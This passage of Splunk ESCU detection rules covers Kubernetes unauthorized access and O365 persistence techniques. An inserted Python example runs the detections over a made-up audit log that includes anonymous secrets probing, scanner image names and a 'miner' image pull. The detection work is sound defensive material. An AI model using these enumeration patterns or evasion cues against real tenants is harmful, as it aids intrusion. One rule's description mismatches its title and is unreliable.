analytic detects unauthorized access to Kubernetes by monitoring Kubernetes audit logs. It identifies anomalies in access patterns by segmenting and analyzing the source of requests. Unauthorized access is worth identifying for a SOC as it could indicate an attacker attempting to infiltrate the system. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects unauthorized access to Kubernetes by monitoring Kubernetes audit logs. It identifies anomalies in access patterns by segmenting and analyzing the source of requests. Unauthorized access is worth identifying for a SOC as it could indicate an attacker attempting to infiltrate the system. The impact of such an attack could be severe, potentially leading to unauthorized access to sensitive systems or data. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc describes how to collect the audit log file: https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md.
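The three audit-log searches in this section, Kubernetes Scanning by Unauthenticated IP Address, Kubernetes Suspicious Image Pulling and Kubernetes Unauthorized Access, are each a field filter over audit.k8s.io events followed by a grouping, and the image names matched by Kubernetes Scanner Image Pulling (which reads Splunk Connect for Kubernetes object events rather than audit logs) are the same kind of string test. The Python below is an added example, not ESCU or Splunk code, that runs all four checks over a constructed NDJSON audit log. ALLOWED_IMAGES stands in for the `kube_allowed_images` macro, whose contents the page does not show, and every event, user and address in SAMPLE_LOG is made up.

```python
"""Added example, not ESCU code: the ESCU Kubernetes audit-log detections
(unauthenticated scanning, suspicious image pull, forbidden create) plus the
scanner-image name match, applied to a constructed audit.k8s.io/v1 NDJSON log.
ALLOWED_IMAGES is an assumed stand-in for the kube_allowed_images macro."""
import json
import re
from collections import defaultdict

SCAN_THRESHOLD = 5                                            # where count > 5
SCANNER_IMAGES = ("kube-hunter", "kube-bench", "kube-recon")  # from the scanner search
ALLOWED_IMAGES = {"docker.io/library/nginx", "registry.k8s.io/pause"}  # assumption
PULL_RE = re.compile(r'^Pulling image "([^"]+)"')


def _ev(verb, uri, code, user="system:anonymous", groups=("system:unauthenticated",),
        ip="203.0.113.7", ua="kube-hunter/0.6", reason=None, message=None, resource=None):
    """Build one constructed audit.k8s.io/v1 event with only the fields the searches use."""
    e = {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": "ResponseComplete",
         "verb": verb, "requestURI": uri, "user": {"username": user, "groups": list(groups)},
         "sourceIPs": [ip], "userAgent": ua, "responseStatus": {"code": code}}
    if reason:
        e["responseStatus"]["reason"] = reason
    if message:  # the kubelet posting a core/v1 Event whose message records the pull
        e["requestObject"] = {"kind": "Event", "message": message}
    if resource:
        e["objectRef"] = {"resource": resource}
    return e


KUBELET = dict(user="system:node:node-1", groups=("system:nodes",), ip="10.0.0.5",
               ua="kubelet/v1.29", resource="events")
DEV = dict(user="dev-user", groups=("developers",), ip="10.0.0.42", ua="kubectl/v1.29",
           resource="pods")
SAMPLE_LOG = "\n".join(json.dumps(e) for e in (
    # six unauthenticated probes from one address, two from another
    [_ev("list", u, 403, reason="Forbidden") for u in
     ("/api/v1/namespaces", "/api/v1/pods", "/api/v1/secrets",
      "/apis/apps/v1/deployments", "/api/v1/nodes", "/api/v1/configmaps")]
    + [_ev("get", "/api/v1/pods", 403, ip="198.51.100.9", ua="curl/8.4", reason="Forbidden")] * 2
    # image pulls reported by the kubelet: one allow-listed, one scanner, one unknown
    + [_ev("create", "/api/v1/namespaces/default/events", 201,
           message=f'Pulling image "{img}"', **KUBELET) for img in
       ("docker.io/library/nginx:1.25", "aquasec/kube-hunter:latest",
        "evil.example/miner@sha256:deadbeef")]
    # one denied and one successful pod creation by a developer
    + [_ev("create", "/api/v1/namespaces/kube-system/pods", 403, reason="Forbidden", **DEV),
       _ev("create", "/api/v1/namespaces/default/pods", 201, **DEV)]
))


def parse_audit(ndjson):
    """One JSON object per line, as the API server's log backend writes them."""
    return [json.loads(line) for line in ndjson.splitlines() if line.strip()]


def image_name(ref):
    """Drop tag/digest so the allow-list is by repository: 'r:5000/a/b:1.2' -> 'r:5000/a/b'."""
    ref = ref.split("@", 1)[0]
    return ref[:ref.rfind(":")] if ref.rfind(":") > ref.rfind("/") else ref


def unauthenticated_scanning(events, threshold=SCAN_THRESHOLD):
    """user.groups{}=system:unauthenticated responseStatus.code=403, counted per source IP."""
    per_ip = defaultdict(lambda: {"count": 0, "userAgent": set(), "requestURI": set()})
    for e in events:
        if "system:unauthenticated" not in e["user"].get("groups", []) \
                or e["responseStatus"].get("code") != 403:
            continue
        for ip in e.get("sourceIPs", []):  # stats by a multivalue field splits per value
            h = per_ip[ip]
            h["count"] += 1
            h["userAgent"].add(e.get("userAgent", ""))
            h["requestURI"].add(e["requestURI"])
    return {ip: h for ip, h in per_ip.items() if h["count"] > threshold}


def suspicious_image_pulls(events, allowed=ALLOWED_IMAGES):
    """requestObject.message="Pulling image*" NOT in the allow-list; scanner images flagged."""
    out = []
    for e in events:
        m = PULL_RE.match(e.get("requestObject", {}).get("message", ""))
        if m and image_name(m.group(1)) not in allowed:
            out.append({"image": m.group(1), "user": e["user"]["username"],
                        "src_ip": e["sourceIPs"][0],
                        "scanner": any(s in m.group(1) for s in SCANNER_IMAGES)})
    return out


def forbidden_creates(events):
    """verb=create responseStatus.reason=Forbidden."""
    return [{"user": e["user"]["username"], "src_ip": e["sourceIPs"][0],
             "resource": e.get("objectRef", {}).get("resource"), "requestURI": e["requestURI"]}
            for e in events
            if e["verb"] == "create" and e["responseStatus"].get("reason") == "Forbidden"]


def run(ndjson=SAMPLE_LOG):
    events = parse_audit(ndjson)
    return {"scanning": unauthenticated_scanning(events),
            "image_pulls": suspicious_image_pulls(events),
            "forbidden_creates": forbidden_creates(events)}


if __name__ == "__main__":
    print(json.dumps(run(), indent=2, default=sorted))
```

An authenticated principal whose get or list is refused matches neither filter: Unauthorized Access keys on verb=create, and the scanning search on the system:unauthenticated group, so a low-privilege service account enumerating secrets needs a further check on responseStatus.code=403 grouped by user.username. Authorized kube-bench or kube-hunter runs will trip the scanner match; exclude the namespace or service account that runs them in the filter macro rather than removing the image from the list.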
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-12-07
action.escu.modification_date = 2023-12-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Unauthorized Access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Security"]
action.risk = 1
action.risk.param._risk_message = Unauthorized access to Kubernetes from user $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Kubernetes Unauthorized Access - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kube_audit` verb=create responseStatus.reason=Forbidden | fillnull | stats count by objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code responseStatus.message sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_unauthorized_access_filter`

[ESCU - O365 Add App Role Assignment Grant User - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is designed to detect the creation of a new Federation setting by alerting on a specific event associated with its creation. By monitoring for this event, the search can identify any instances where a Federation setting is being created within the system. This can help in detecting and monitoring any unauthorized or suspicious changes to the Federation settings, providing an additional layer of security for your environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search is designed to detect the creation of a new Federation setting by alerting on a specific event associated with its creation. By monitoring for this event, the search can identify any instances where a Federation setting is being created within the system. This can help in detecting and monitoring any unauthorized or suspicious changes to the Federation settings, providing an additional layer of security for your environment.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on. This search works with o365:management:activity events.
action.escu.known_false_positives = The creation of a new Federation is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at a different cloud provider.
action.escu.creation_date = 2023-07-11
action.escu.modification_date = 2023-07-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Add App Role Assignment Grant User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse"]
action.risk = 1
action.risk.param._risk_message = User $user$ has created a new federation setting $modified_properties_name$ on $dest$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 18}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 18}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Add App Role Assignment Grant User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is designed to detect the creation of a new Federation setting by alerting on a specific event associated with its creation. By monitoring for this event, the search can identify any instances where a Federation setting is being created within the system. This can help in detecting and monitoring any unauthorized or suspicious changes to the Federation settings, providing an additional layer of security for your environment.
action.notable.param.rule_title = O365 Add App Role Assignment Grant User
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add app role assignment grant to user." | stats count min(_time) as firstTime max(_time) as lastTime values(Actor{}.ID) as Actor.ID values(Actor{}.Type) as Actor.Type values(ModifiedProperties{}.Name) as modified_properties_name by user dest ResultStatus Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_add_app_role_assignment_grant_user_filter`

[ESCU - O365 Added Service Principal - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the addition of new service principal accounts to O365 tenants. Attackers can abuse service principals in Office 365 (now known as Microsoft 365) to gain unauthorized access and perform malicious actions within an organization's environment. Service principals are essentially non-human accounts used by applications, services, or scripts to access resources and interact with APIs on behalf of the organization.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects the addition of new service principal accounts to O365 tenants. Attackers can abuse service principals in Office 365 (now known as Microsoft 365) to gain unauthorized access and perform malicious actions within an organization's environment. Service principals are essentially non-human accounts used by applications, services, or scripts to access resources and interact with APIs on behalf of the organization.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on. This search works with o365:management:activity events.
action.escu.known_false_positives = The creation of a new Federation is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at a different cloud provider.
action.escu.creation_date = 2023-08-02
action.escu.modification_date = 2023-08-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Added Service Principal - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = User $src_user$ has created new service principal $new_value$ in AzureActiveDirectory
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Added Service Principal - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "Cloud Federated Credential Abuse", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the addition of new service principal accounts to O365 tenants. Attackers can abuse service principals in Office 365 (now known as Microsoft 365) to gain unauthorized access and perform malicious actions within an organization's environment. Service principals are essentially non-human accounts used by applications, services, or scripts to access resources and interact with APIs on behalf of the organization.
action.notable.param.rule_title = O365 Added Service Principal
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="*Add service principal*" OR (Operation = "*principal*" AND action = "created") | stats count min(_time) as firstTime max(_time) as lastTime values(ModifiedProperties{}.NewValue) as new_value by src_user src_user_type action Operation authentication_service Workload | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_added_service_principal_filter`

[ESCU - O365 Admin Consent Bypassed by Service Principal - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection targets situations where a service principal in Office 365 Azure Active Directory assigns app roles without the standard admin consent, a potential security breach. Using o365_management_activity logs, it examines the 'Add app role assignment to service principal' operation, focusing on service principals and extracting details like role ID and description. This is critical for SOCs to detect potential bypassing of crucial administrative controls, which could lead to unauthorized access or privilege escalation. A true positive implies a service principal might be misusing automated processes to assign sensitive permissions.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection targets situations where a service principal in Office 365 Azure Active Directory assigns app roles without the standard admin consent, a potential security breach. Using o365_management_activity logs, it examines the 'Add app role assignment to service principal' operation, focusing on service principals and extracting details like role ID and description. This is critical for SOCs to detect potential bypassing of crucial administrative controls, which could lead to unauthorized access or privilege escalation. A true positive implies a service principal might be misusing automated processes to assign sensitive permissions.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Service Principals are sometimes configured to legitimately bypass the consent process for purposes of automation. Filter as needed.
action.escu.creation_date = 2024-02-09
action.escu.modification_date = 2024-02-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Admin Consent Bypassed by Service Principal - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms"]
action.risk = 1
action.risk.param._risk_message = Service principal $src_user$ bypassed the admin consent process and granted permissions to $dest_user$
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Admin Consent Bypassed by Service Principal - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection targets situations where a service principal in Office 365 Azure Active Directory assigns app roles without the standard admin consent, a potential security breach. Using o365_management_activity logs, it examines the 'Add app role assignment to service principal' operation, focusing on service principals and extracting details like role ID and description. This is critical for SOCs to detect potential bypassing of crucial administrative controls, which could lead to unauthorized access or privilege escalation. A true positive implies a service principal might be misusing automated processes to assign sensitive permissions.
action.notable.param.rule_title = O365 Admin Consent Bypassed by Service Principal
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add app role assignment to service principal." | eval len=mvcount('Actor{}.ID') | eval userType = mvindex('Actor{}.ID',len-1) | eval roleId = mvindex('ModifiedProperties{}.NewValue', 0) | eval roleValue = mvindex('ModifiedProperties{}.NewValue', 1) | eval roleDescription = mvindex('ModifiedProperties{}.NewValue', 2) | eval dest_user = mvindex('Target{}.ID', 0) | search userType = "ServicePrincipal" | eval src_user = user | stats count earliest(_time) as firstTime latest(_time) as lastTime by src_user dest_user roleId roleValue roleDescription | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_admin_consent_bypassed_by_service_principal_filter`

[ESCU - O365 Advanced Audit Disabled - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies instances where the O365 advanced audit is disabled for a specific user within the Office 365 tenant. It leverages O365 audit logs, specifically events related to audit license changes or modifications within the AzureActiveDirectory workloads. The O365 advanced audit provides granular logging and insights into user and administrator activities, making it a crucial tool for security monitoring and incident response. Disabling this audit for a user can blind security teams to potential malicious or unauthorized activities related to that user's mailbox or account. Attackers may disable these audits to obscure their actions and reduce the chances of detection. If an attacker successfully disables the O365 advanced audit for a user, they can operate within that user's mailbox or account with reduced risk of detection. This can lead to unauthorized data access, data exfiltration, account compromise, or other malicious activities without leaving a detailed audit trail.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic identifies instances where the O365 advanced audit is disabled for a specific user within the Office 365 tenant. It leverages O365 audit logs, specifically events related to audit license changes or modifications within the AzureActiveDirectory workloads. The O365 advanced audit provides granular logging and insights into user and administrator activities, making it a crucial tool for security monitoring and incident response. Disabling this audit for a user can blind security teams to potential malicious or unauthorized activities related to that user's mailbox or account. Attackers may disable these audits to obscure their actions and reduce the chances of detection. If an attacker successfully disables the O365 advanced audit for a user, they can operate within that user's mailbox or account with reduced risk of detection. This can lead to unauthorized data access, data exfiltration, account compromise, or other malicious activities without leaving a detailed audit trail.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Administrators might temporarily disable the advanced audit for troubleshooting, performance reasons, or other administrative tasks. Filter as needed.
action.escu.creation_date = 2023-09-19
action.escu.modification_date = 2023-09-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Advanced Audit Disabled - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms"]
action.risk = 1
action.risk.param._risk_message = Advanced auditing for user $object$ was disabled by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 32}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Advanced Audit Disabled - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 80, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies instances where the O365 advanced audit is disabled for a specific user within the Office 365 tenant. It leverages O365 audit logs, specifically events related to audit license changes or modifications within the AzureActiveDirectory workloads. The O365 advanced audit provides granular logging and insights into user and administrator activities, making it a crucial tool for security monitoring and incident response. Disabling this audit for a user can blind security teams to potential malicious or unauthorized activities related to that user's mailbox or account. Attackers may disable these audits to obscure their actions and reduce the chances of detection. If an attacker successfully disables the O365 advanced audit for a user, they can operate within that user's mailbox or account with reduced risk of detection. This can lead to unauthorized data access, data exfiltration, account compromise, or other malicious activities without leaving a detailed audit trail.
action.notable.param.rule_title = O365 Advanced Audit Disabled
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Operation="Change user license." | eval property_name = mvindex('ExtendedProperties{}.Name', 1) | search property_name = "extendedAuditEventCategory" | eval additionalDetails = mvindex('ExtendedProperties{}.Value',0) | eval split_value=split(additionalDetails, "NewValue") | eval possible_plan=mvindex(split_value, 1) | rex field="possible_plan" "DisabledPlans=\[(?P<DisabledPlans>[^\]]+)\]" | search DisabledPlans IN ("*M365_ADVANCED_AUDITING*") | stats min(_time) as firstTime max(_time) as lastTime by Operation user object DisabledPlans | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_advanced_audit_disabled_filter`

[ESCU - O365 Application Registration Owner Added - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies instances where a new owner is assigned to an application registration within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in owner assignments within the AzureActiveDirectory workload for application registrations. Assigning a new owner to an application registration can grant significant control over the application's configuration, permissions, and behavior. An unauthorized or inadvertent change in ownership can lead to misuse of the application, potentially affecting data access, user permissions, or the application's interactions within the tenant. Monitoring for such changes ensures that only legitimate and authorized personnel have control over application registrations. If an attacker successfully assigns themselves or a compromised account as an owner to an application registration, they can modify the application's settings, permissions, and behavior. This can lead to unauthorized data access, escalation of privileges, or the introduction of malicious behavior within the application's operations.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies instances where a new owner is assigned to an application registration within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in owner assignments within the AzureActiveDirectory workload for application registrations. Assigning a new owner to an application registration can grant significant control over the application's configuration, permissions, and behavior. An unauthorized or inadvertent change in ownership can lead to misuse of the application, potentially affecting data access, user permissions, or the application's interactions within the tenant. Monitoring for such changes ensures that only legitimate and authorized personnel have control over application registrations. If an attacker successfully assigns themselves or a compromised account as an owner to an application registration, they can modify the application's settings, permissions, and behavior. This can lead to unauthorized data access, escalation of privileges, or the introduction of malicious behavior within the application's operations.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Application owners may be added for legitimate reasons, filter as needed.
action.escu.creation_date = 2023-09-07
action.escu.modification_date = 2023-09-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Application Registration Owner Added - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Application registration $app_displayName$ was assigned a new owner $object$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Application Registration Owner Added - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies instances where a new owner is assigned to an application registration within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in owner assignments within the AzureActiveDirectory workload for application registrations. Assigning a new owner to an application registration can grant significant control over the application's configuration, permissions, and behavior. An unauthorized or inadvertent change in ownership can lead to misuse of the application, potentially affecting data access, user permissions, or the application's interactions within the tenant. Monitoring for such changes ensures that only legitimate and authorized personnel have control over application registrations. If an attacker successfully assigns themselves or a compromised account as an owner to an application registration, they can modify the application's settings, permissions, and behavior. This can lead to unauthorized data access, escalation of privileges, or the introduction of malicious behavior within the application's operations.
action.notable.param.rule_title = O365 Application Registration Owner Added
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add owner to application." | eval app_id=mvindex('ModifiedProperties{}.NewValue', 0) | eval app_displayName=mvindex('ModifiedProperties{}.NewValue', 1) | stats max(_time) as lastTime values(ModifiedProperties{}.NewValue) by Operation, user, app_displayName, object | `security_content_ctime(lastTime)` | `o365_application_registration_owner_added_filter`

[ESCU - O365 ApplicationImpersonation Role Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the assignment of the ApplicationImpersonation role in Office 365, either to a user or an application. This analytic leverages the Office 365 Management Activity API, specifically monitoring for events related to role assignments and changes within the Azure Active Directory audit logs. The ApplicationImpersonation role allows a security principal to impersonate any user within the organization and perform actions on their behalf, such as accessing or modifying their mailbox. This role, if misused or granted inappropriately, can pose a significant security risk. Monitoring the assignment of this role is crucial as it can be an indicator of potential malicious activity or misconfigurations. If an attacker successfully assigns the ApplicationImpersonation role to a malicious user or application, they can gain the ability to impersonate any user within the organization. This can lead to unauthorized access to sensitive information, manipulation of mailbox data, and other malicious actions. The attacker can effectively masquerade as a legitimate user, making their actions harder to detect and potentially causing significant harm to the organization.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the assignment of the ApplicationImpersonation role in Office 365, either to a user or an application. This analytic leverages the Office 365 Management Activity API, specifically monitoring for events related to role assignments and changes within the Azure Active Directory audit logs. The ApplicationImpersonation role allows a security principal to impersonate any user within the organization and perform actions on their behalf, such as accessing or modifying their mailbox. This role, if misused or granted inappropriately, can pose a significant security risk. Monitoring the assignment of this role is crucial as it can be an indicator of potential malicious activity or misconfigurations. If an attacker successfully assigns the ApplicationImpersonation role to a malicious user or application, they can gain the ability to impersonate any user within the organization. This can lead to unauthorized access to sensitive information, manipulation of mailbox data, and other malicious actions. The attacker can effectively masquerade as a legitimate user, making their actions harder to detect and potentially causing significant harm to the organization.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = While infrequent, the ApplicationImpersonation role may be granted for legitimate reasons, filter as needed.
action.escu.creation_date = 2023-10-17
action.escu.modification_date = 2023-10-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 ApplicationImpersonation Role Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "Office 365 Collection Techniques", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = $user$ granted the ApplicationImpersonation role to $target_user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 ApplicationImpersonation Role Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "Office 365 Collection Techniques", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
